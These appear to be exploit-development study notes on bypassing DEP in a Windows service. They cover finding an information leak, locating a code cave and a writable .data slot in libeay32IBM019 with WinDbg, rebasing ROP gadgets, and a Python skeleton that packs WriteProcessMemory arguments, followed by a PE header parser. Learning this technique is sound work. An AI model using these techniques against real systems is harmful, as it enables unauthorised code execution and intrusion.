Module 0x0a
Example information leak, found via the import SymGetSymFromName in IDA. Used xrefs to find where the call was made and confirmed that the address could be received via a network packet.
After finding an info leak, locate a module to use for ROP via WinDbg:
lm f
Look for a module that ships with the software, for portability.
Test for bad bytes by checking the first few bytes of the target module's address across multiple restarts. In the example the address did contain bad bytes in some cases; this was acceptable because the service was restarted by a watchdog, so the program could be crashed and the new address checked via the info leak.
Procmon can be used to watch for "Process Exit" and "Process Start" operations. The program can be crashed by attaching WinDbg and then closing it.
Using WriteProcessMemory for DEP bypass.
The dword at offset 0x3c gives the offset of the PE header; the dword at PE header + 0x2c gives the offset of the code section.
Alternatively, use lm to find the module start and !address to locate the "End Address", which pointed to the code section in testing.
Once the code section is located, use !address to find its "End Address" and check the protection.
A code cave was located at End Address - {size of payload}. The offset was recorded as ({end address} - {size of payload}) - {module name}:
e.g. ?03283000 - 400 - libeay32IBM019
A code cave results from the padding added to the end of a code page when the compiled code does not fill the full page.
WriteProcessMemory needs a pointer to a writable location for lpNumberOfBytesWritten. Use !dh to locate the .data section:
SECTION HEADER #4
.data name
F018 virtual size
D5000 virtual address
Sections are mapped up to a page boundary, so the first dword past the section's virtual size is unused and can be used:
(libeay32IBM019 + d5000 + f018 + 4) - libeay32IBM019 = offset to .data (0xe401c in example below)
Use !vprot to check that Protect = PAGE_READWRITE.
Skeleton for the WPM call (WPMAddr and dllBase are filled in from the info leak at runtime):
from struct import pack

WPMAddr = 0x0         # placeholder: WriteProcessMemory address resolved via the info leak
dllBase = 0x031f0000  # placeholder: leaked libeay32IBM019 base (0x031f0000 in the WinDbg session below)
wpm = pack("<L", WPMAddr)             # WriteProcessMemory address
wpm += pack("<L", dllBase + 0x92c04)  # return address: the code cave, executed once WPM has written the shellcode there
wpm += pack("<L", 0xFFFFFFFF)         # hProcess: pseudo handle for the current process
wpm += pack("<L", dllBase + 0x92c04)  # lpBaseAddress: code cave address
wpm += pack("<L", 0x41414141)         # dummy lpBuffer (stack address)
wpm += pack("<L", 0x42424242)         # dummy nSize
wpm += pack("<L", dllBase + 0xe401c)  # lpNumberOfBytesWritten: writable dword past the end of .data
wpm += b"A" * 0x10
rp++ outputs addresses relative to the preferred base address:
0x100408d6: push esp ; pop esi ; ret
Need to find the image base. It can be checked manually via:
0:077> dd libeay32IBM019 + 3c L1
031f003c 00000108
0:077> dd libeay32IBM019 + 108 + 34 L1
031f013c 10000000 <--- imagebase
The gadget offset is thus 0x100408d6 - 0x10000000:
0x408d6
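As an added example (not part of the course notes), the header walk described above (0x3c to the PE header, +0x2c BaseOfCode, +0x34 ImageBase, section table with page-aligned slack) and the rebasing of the rp++ gadget address, done in Python over a constructed minimal PE image whose values mirror the numbers in these notes. The same parse is how a defender audits a module for writable+executable sections; the image bytes are constructed here, not dumped from a real binary.

```python
from struct import pack, unpack_from

PAGE = 0x1000  # sections are mapped on page boundaries; bytes past VirtualSize up to the boundary are slack

def build_sample_pe():
    """Constructed 32-bit PE headers (no real code) whose values mimic the notes above."""
    pe_off = 0x80
    dos = b"MZ" + b"\0" * (0x3C - 2) + pack("<L", pe_off)          # e_lfanew at offset 0x3c
    dos += b"\0" * (pe_off - len(dos))
    file_hdr = pack("<HHLLLHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x2102)   # 2 sections, 0xE0-byte optional header
    opt = bytearray(0xE0)
    opt[0:2] = pack("<H", 0x10B)                                    # PE32 magic
    opt[0x14:0x18] = pack("<L", 0x1000)                             # BaseOfCode  (PE + 0x2c)
    opt[0x1C:0x20] = pack("<L", 0x10000000)                         # ImageBase   (PE + 0x34)
    secs = pack("<8sLLLLLLHHL", b".text", 0x1C00, 0x1000, 0x1C00, 0x400, 0, 0, 0, 0, 0x60000020)
    secs += pack("<8sLLLLLLHHL", b".data", 0xF018, 0xD5000, 0xF000, 0x2000, 0, 0, 0, 0, 0xC0000040)
    return dos + b"PE\0\0" + file_hdr + bytes(opt) + secs

def parse_pe(buf):
    """Walk the headers the way the notes do and return base, code RVA and per-section info."""
    pe = unpack_from("<L", buf, 0x3C)[0]
    if buf[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = unpack_from("<H", buf, pe + 6)[0]
    opt_size = unpack_from("<H", buf, pe + 20)[0]
    base_of_code = unpack_from("<L", buf, pe + 0x2C)[0]
    image_base = unpack_from("<L", buf, pe + 0x34)[0]
    sections = []
    for i in range(nsec):
        name, vsize, va, *_, chars = unpack_from("<8sLLLLLLHHL", buf, pe + 24 + opt_size + 40 * i)
        mapped = -(-vsize // PAGE) * PAGE                           # round VirtualSize up to a page
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "slack": mapped - vsize,                   # unused tail of the last page
                         "exec": bool(chars & 0x20000000), "write": bool(chars & 0x80000000)})
    return {"image_base": image_base, "base_of_code": base_of_code, "sections": sections}

def offset_from_base(addr, image_base):
    """Rebase an absolute address printed at the preferred base (e.g. by rp++) to a module offset."""
    return addr - image_base

def audit(hdr):
    """Per-section permission flags and page slack; a 'WX' entry is a W+X section worth flagging."""
    return {s["name"]: (("W" if s["write"] else "-") + ("X" if s["exec"] else "-"), s["slack"])
            for s in hdr["sections"]}

if __name__ == "__main__":
    hdr = parse_pe(build_sample_pe())
    print(hex(hdr["image_base"]), hex(offset_from_base(0x100408D6, hdr["image_base"])), audit(hdr))
```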